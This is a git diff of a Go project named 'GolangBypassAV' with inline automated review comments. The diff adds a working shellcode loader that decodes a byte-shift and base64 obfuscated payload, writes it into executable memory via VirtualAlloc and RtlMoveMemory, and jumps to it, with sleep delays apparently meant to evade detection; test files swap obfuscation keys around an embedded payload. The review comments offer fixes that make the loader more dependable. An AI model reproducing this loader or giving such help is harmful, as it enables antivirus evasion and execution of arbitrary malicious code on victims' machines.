diff --git a/main.go b/main.go index 99a9a83..6e76cef 100644 --- a/main.go +++ b/main.go @@ -1,8 +1,7 @@ package main import ( - "encoding/hex" - "fmt" + "GolangBypassAV/shellcode" "io/ioutil" "os" ) @@ -10,18 +9,8 @@ import ( func main() { if len(os.Args) != 2 { - fmt.Printf("Must have shellcode of file\n") os.Exit(1) } - - sc, err := ioutil.ReadFile(os.Args[1]) - if os.IsNotExist(err) { - sc, err = hex.DecodeString(os.Args[1]) - if err != nil { - fmt.Printf("Error decoding arg 1: %s\n", err) - os.Exit(1) - } - } - fmt.Println(sc) - //shellcode.Run(sc) + sc, _ := ioutil.ReadFile(os.Args[1]) + shellcode.Run(sc) } diff --git a/shellcode/bp.go b/shellcode/bp.go new file mode 100644 index 0000000..22149f9 --- /dev/null +++ b/shellcode/bp.go @@ -0,0 +1 @@ +package shellcode diff --git a/shellcode/main.go b/shellcode/main.go new file mode 100644 index 0000000..a631433 --- /dev/null +++ b/shellcode/main.go 
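Review bot: `sc, _ := ioutil.ReadFile(os.Args[1])` in the new `main` discards the read error, so a missing or unreadable path now hands a nil slice to `shellcode.Run` with no diagnostic, and the usage message for the wrong-argument case was dropped in the same hunk. Keep the check the old code had: `sc, err := ioutil.ReadFile(os.Args[1])` followed by `if err != nil { println(err.Error()); os.Exit(1) }` (`println` avoids re-importing `fmt`), and put a one-line usage message back before the first `os.Exit(1)`. The hex-string fallback is gone as well; if that is deliberate, a comment on `main` stating that the single argument must be a file path would save the next reader from guessing. If the module's `go.mod` is at 1.16 or later, `os.ReadFile` replaces the deprecated `ioutil.ReadFile` and lets the `io/ioutil` import go.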
@@ -0,0 +1,125 @@
+package shellcode
+
+import (
+	"GolangBypassAV/encry"
+	"encoding/base64"
+	"fmt"
+	"os"
+	"syscall"
+	"time"
+	"unsafe"
+)
+
+const (
+	MEM_COMMIT             = 0x1000
+	MEM_RESERVE            = 0x2000
+	PAGE_EXECUTE_READWRITE = 0x40
+)
+
+var kk = []byte{0x12}
+
+func base64Decode(data string) []byte {
+	data1, _ := base64.StdEncoding.DecodeString(data)
+	return data1
+}
+
+func base64Encode(data []byte) string {
+	bdata := base64.StdEncoding.EncodeToString(data)
+	return bdata
+}
+
+func getEnCode(data []byte) string {
+	bdata := base64.StdEncoding.EncodeToString(data)
+
+	bydata := []byte(bdata)
+	var shellcode []byte
+
+	for i := 0; i < len(bydata); i++ {
+		shellcode = append(shellcode, bydata[i]+kk[0])
+	}
+	return base64.StdEncoding.EncodeToString(shellcode)
+}
+
+var (
+	kernel32      = syscall.MustLoadDLL("kernel32.dll")
+	ntdll         = syscall.MustLoadDLL("ntdll.dll")
+	VirtualAlloc  = kernel32.MustFindProc("VirtualAlloc")
+	RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory")
+)
+
+func getDeCode(string2 string) []byte {
+
+	ss, _ := base64.StdEncoding.DecodeString(string2)
+	string2 = string(ss)
+	var shellcode []byte
+
+	bydata := []byte(string2)
+
+	for i := 0; i < len(bydata); i++ {
+		shellcode = append(shellcode, bydata[i]-kk[0])
+	}
+	ssb, _ := base64.StdEncoding.DecodeString(string(shellcode))
+	return ssb
+
+}
+
+func checkError(err error) {
+	if err != nil {
+		if err.Error() != "The operation completed successfully." {
+			println(err.Error())
+			os.Exit(1)
+		}
+	}
+}
+
+func genEXE(charcode []byte) {
+
+	addr, _, err := VirtualAlloc.Call(0, uintptr(len(charcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
+	if addr == 0 {
+		checkError(err)
+	}
+	gd()
+
+	_, _, err = RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&charcode[0])), uintptr(len(charcode)))
+	checkError(err)
+
+	gd()
+	for j := 0; j < len(charcode); j++ {
+		charcode[j] = 0
+	}
+	syscall.Syscall(addr, 0, 0, 0, 0)
+}
+
+func gd() int64 {
+	time.Sleep(time.Duration(2) * time.Second)
+
+	dd := time.Now().UTC().UnixNano()
+	return dd + 123456
+
+}
+
+func getFileShellCode(file string) []byte {
+	data := encry.ReadFile(file)
+	//shellCodeHex := encry.GetBase64Data(data)
+	//fmt.Print(shellCodeHex)
+	return data
+}
+
+func getFileShellCode1(file string) string {
+	data := encry.ReadFile(file)
+	shellCodeHex := base64Encode(data)
+	fmt.Print(shellCodeHex)
+	return shellCodeHex
+}
+
+func Run(string2 []byte) {
+	//fmt.Println(1)
+
+	//fmt.Print(getEnCode(getFileShellCode("C:\\Users\\Administrator\\Desktop\\payload.bin")))
+
+	dd := getEnCode(string2)
+
+	shellCodeHex := getDeCode(dd)
+	gd()
+	genEXE(shellCodeHex)
+}
diff --git a/test1/main.go b/test1/main.go
index aa6c461..5da9995 100644
--- a/test1/main.go
+++ b/test1/main.go
@@ -16,7 +16,7 @@ const (
 	PAGE_EXECUTE_READWRITE = 0x40
 )
 
-var kk = []byte{0x11}
+var kk = []byte{0x21}
 
 func base64Decode(data string) []byte {
 	data1, _ := base64.StdEncoding.DecodeString(data)
diff --git a/test2/main.go b/test2/main.go
index 5edbb4e..fa286a6 100644
--- a/test2/main.go
+++ b/test2/main.go
@@ -16,7 +16,7 @@ const (
 	PAGE_EXECUTE_READWRITE = 0x40
 )
 
-var kk = []byte{0x11}
+var kk = []byte{0x13, 0x32}
 
 func base64Decode(data string) []byte {
 	data1, _ := base64.StdEncoding.DecodeString(data)
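Review bot: `checkError` treats a call as successful only when `err.Error()` equals the English text "The operation completed successfully.", but `Proc.Call` documents that its error is always non-nil and built from GetLastError, so on a non-English Windows install the unconditional `checkError(err)` after `RtlMoveMemory.Call` prints a localized success message and exits even though the copy worked. Compare the errno rather than the message, `if e, ok := err.(syscall.Errno); ok && e != 0 { println(e.Error()); os.Exit(1) }`, and since `RtlMoveMemory` has no failure return value the last-error read after it is presumably stale from an earlier call, so the `addr == 0` pattern already used for `VirtualAlloc` is the reliable check and the one after `RtlMoveMemory` is best dropped. `getDeCode` discards both `DecodeString` errors (`ss, _` and `ssb, _`), so input that was not produced with this file's `kk` still reaches `genEXE`, which allocates, copies and jumps into whatever partial bytes came back; return or exit on those errors before `Run` calls `genEXE`. `Run` also encodes and immediately decodes the same buffer (`getEnCode` then `getDeCode`), and `base64Decode`, `getFileShellCode` and `getFileShellCode1` are never called, which reads as leftover scaffolding worth a comment or removal.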
@@ -35,7 +35,7 @@ func getEnCode(data []byte) string {
 	var shellcode []byte
 
 	for i := 0; i < len(bydata); i++ {
-		shellcode = append(shellcode, bydata[i]+kk[0])
+		shellcode = append(shellcode, bydata[i]+kk[0]-kk[1])
 	}
 	return base64.StdEncoding.EncodeToString(shellcode)
 }
@@ -56,7 +56,7 @@ func getDeCode(string2 string) []byte {
 	bydata := []byte(string2)
 
 	for i := 0; i < len(bydata); i++ {
-		shellcode = append(shellcode, bydata[i]-kk[0])
+		shellcode = append(shellcode, bydata[i]-kk[0]+kk[1])
 	}
 	ssb, _ := base64.StdEncoding.DecodeString(string(shellcode))
 	return ssb
@@ -113,7 +113,7 @@ func main() {
 
 	//fmt.Print(getEnCode(getFileShellCode("C:\\Users\\Administrator\\Desktop\\payload.bin")))
 
-	bbdata := "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"
+	bbdata := "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"
 	shellCodeHex := getDeCode(bbdata)
 	gd()
 	genEXE(shellCodeHex)
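Review bot: The changed transform in `getDeCode` must agree with whatever produced the embedded `bbdata`, and the context line `ssb, _ := base64.StdEncoding.DecodeString(string(shellcode))` drops the only signal that it does not: a payload encoded with the old `kk` decodes to bytes that are not valid base64, `DecodeString` returns partial output plus an error, the error is discarded and the partial bytes go on to `genEXE`. Change it to `ssb, err := base64.StdEncoding.DecodeString(string(shellcode))` and exit when `err != nil` (the `ss, _` decode at the top of the function, above this hunk, has the same gap). Note also that `bydata[i]-kk[0]+kk[1]` is a per-byte constant, so the second key byte only changes the offset; that is fine if intended but deserves a comment now that `kk` is a two-element slice. `getDeCode` starts above this hunk and its closing brace is below it.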